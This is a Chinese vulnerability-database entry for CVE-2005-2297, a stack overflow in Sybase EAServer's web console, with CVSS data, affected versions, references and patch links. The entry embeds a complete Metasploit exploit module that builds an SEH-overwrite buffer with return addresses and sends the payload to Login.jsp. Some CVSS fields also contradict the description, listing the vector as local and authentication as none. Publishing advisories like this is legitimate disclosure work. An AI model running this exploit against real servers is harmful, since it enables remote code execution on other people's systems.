CVE-2005-2297
CVSS4.6
发布时间 :2005-07-19 00:00:00
修订时间 :2016-10-17 23:26:11
NMCOE    

[原文]Stack-based buffer overflow in TreeAction.do in Sybase EAServer 4.2.5 through 5.2 allows remote authenticated users to execute arbitrary code via a large javascript parameter.


[CNNVD]Sybase EAServer TreeAction.do 堆栈溢出漏洞(CNNVD-200507-220)

        Sybase EAServer 是一种广泛采用的Java应用服务器,用于组建多层次的、安全的、大型的分布式的Web应用,如电子商务网站等等。
        Sybase EAServer 4.2.5至5.2的TreeAction.do存在堆栈溢出漏洞。
        远程认证用户可以通过超大javascript参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sybase:easerver:5.1Sybase EAServer 5.1
cpe:/a:sybase:easerver:4.2.5Sybase EAServer 4.2.5
cpe:/a:sybase:easerver:5.2Sybase EAServer 5.2
cpe:/a:sybase:easerver:5.0Sybase EAServer 5.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2297
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2297
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-220
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112146180532313&w=2
(UNKNOWN)  BUGTRAQ  20050715 Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2
http://securitytracker.com/id?1014497
(UNKNOWN)  SECTRACK  1014497
http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm
(VENDOR_ADVISORY)  MISC  http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm
http://www.sybase.com/detail?id=1036742
(VENDOR_ADVISORY)  CONFIRM  http://www.sybase.com/detail?id=1036742

- 漏洞信息

Sybase EAServer TreeAction.do 堆栈溢出漏洞
中危 缓冲区溢出
2005-07-19 00:00:00 2005-10-20 00:00:00
本地  
        Sybase EAServer 是一种广泛采用的Java应用服务器,用于组建多层次的、安全的、大型的分布式的Web应用,如电子商务网站等等。
        Sybase EAServer 4.2.5至5.2的TreeAction.do存在堆栈溢出漏洞。
        远程认证用户可以通过超大javascript参数执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.sybase.com/detail?id=1036742

- 漏洞信息 (16766)

Sybase EAServer 5.2 Remote Stack Buffer Overflow (EDBID:16766)
windows remote
2010-06-22 Verified
8080 metasploit
N/A [点击下载]
##
# $Id: sybase_easerver.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Sybase EAServer 5.2 Remote Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Sybase EAServer Web
				Console. The offset to the SEH frame appears to change depending
				on what version of Java is in use by the remote server, making this
				exploit somewhat unreliable.
			},
			'Author'         => [ 'anonymous' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2005-2297' ],
					[ 'OSVDB', '17996' ],
					[ 'BID', '14287'],
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    	=> 1000,
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Technically we could combine these into a single multi-return string...
					['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}],
					['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?',  {'Ret' => 0x6d4548ff, 'Offset' => 3841}],
					['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}],
					['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}],
				],
			'DisclosureDate' => 'Jul 25 2005'))

		register_options(
			[
				OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]),
				Opt::RPORT(8080)
			], self.class)
	end

	def exploit

		print_status( "Attempting to exploit...")

		# Building the evil buffer
		crash = rand_text_alphanumeric(5000, payload_badchars)
		crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
		crash[ target['Offset']    , 4 ] = [target.ret].pack('V')
		crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded

		# Sending the request
		res = send_request_cgi({
			'uri'          => datastore['DIR'] + 'Login.jsp?' + crash,
			'method'       => 'GET',
			'headers'      => {
				'Accept'	=> '*/*',
				'User-Agent'	=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
			}
		}, 5)

		print_status("Overflow request sent, sleeping for four seconds")
		select(nil,nil,nil,4)
	end

end
		

- 漏洞信息

17995
Sybase EAServer WebConsole TreeAction.do Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Commercial Vendor Verified

- 漏洞描述

- 时间线

2005-07-11 Unknow
2005-11-04 2005-07-11

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sybase has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站